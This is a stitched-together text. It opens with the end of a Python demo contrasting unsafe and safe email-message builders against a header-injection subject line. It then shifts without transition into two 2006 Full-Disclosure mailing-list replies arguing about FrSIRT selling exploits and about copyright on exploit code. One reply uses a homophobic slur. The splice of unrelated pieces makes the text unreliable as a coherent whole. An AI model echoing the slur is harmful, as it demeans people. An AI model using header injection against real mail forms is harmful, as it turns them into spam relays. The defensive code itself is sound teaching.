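    print(header_count(build_message_unsafe("a@example.org", hostile_subject, "hi")))  # 3
    print(header_count(build_message_safe("a@example.org", "Hello", "hi")))            # 2
    try:
        build_message_safe("a@example.org", hostile_subject, "hi")
    except ValueError as e:
        print("rejected:", e)
```

Rejecting rather than stripping is the safer choice: stripping has to be repeated for every encoding the input can arrive in (the web layer must URL-decode before this check runs), while a rejected request is both safe and visible in the application log, which is what you want when someone is probing a form for use as a spam relay.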


Re: [Full-disclosure] FrSIRT Puts Exploits up for Sale

2006-03-17 Thread Georgi Guninski
On Fri, Mar 17, 2006 at 08:44:10AM +0100, Michal Zalewski wrote:
> On Fri, 17 Mar 2006 [EMAIL PROTECTED] wrote:
> 
> > If you publish something without a license it is OPEN DOMAIN
> > That means people can use it, modify it, sell it...
> 
> That's nonsense. If I publish a book or a photo or a newspaper article
> without a lengthy license attached, you can copy it at will, too? The
> requirement of a license or a copyright notice is a long-running myth - it
> is good to have these, but they are not a legal requirement.
>

IANAL but believe that putting copyright sh*t in exploits/advisories
wouldn't hurt exploit writers (even if anonymous).

[1]
http://cve.mitre.org/compatible/product_type.html

just look how many lamers profit from copy/paste with the mouse
(hint - search for vulnerability database)

AFAIK hamericans are suing for getting fat because they eat too much, so
clear violations of international copyright law like this:

http://72.14.203.104/search?q=cache:r4EuqF0hL9YJ:www.frsirt.com/exploits/20041216.Guninski.php+copyright+guninski+site:www.frsirt.com&hl=bg&gl=bg&ct=clnk&cd=1

may raise some money with little to no investment in hungry lawyers.

another irony is the fact that v3nd0rs try to convince people that exploits
are illegal, but legitimate businesses *sell* exploits - [1].


-- 
ж

EOM

junk

 

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] FrSIRT Puts Exploits up for Sale

2006-03-17 Thread poo
bah those frogs were faghats anyway 
On 3/17/06, Michal Zalewski <[EMAIL PROTECTED]> wrote:
> On Fri, 17 Mar 2006 [EMAIL PROTECTED] wrote:
> > If you publish something without a license it is OPEN DOMAIN
> > That means people can use it, modify it, sell it...
>
> That's nonsense. If I publish a book or a photo or a newspaper article
> without a lengthy license attached, you can copy it at will, too? The
> requirement of a license or a copyright notice is a long-running myth - it
> is good to have these, but they are not a legal requirement.
>
> All your private writing, recording, coding, photography, etc is protected
> by copyright, period. Unless you explicitly allow others to use your work,
> it is not legal to do so, with certain specific common-sense exceptions
> (fair use clauses vary from place to place, but usually involve
> applications that are either entirely non-commercial, or benefit the
> society).
>
> In some places, it can be successfully argued that by deciding to release
> information during a press conference, on a mailing list, etc, grants some
> entities an implicit permission to do certain things with that
> information, but it's generally rather tricky (and subject to individual
> interpretation by the court). In any case, this just means that because
> you posted to a mailing list, the server can reasonably process and store
> your message, and distribute it to the intended audience. It does not
> necessarily mean that others can grab it for unrelated purposes and sell
> it to third parties.
>
> /mz

-- 
smile tomorrow will be worse 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/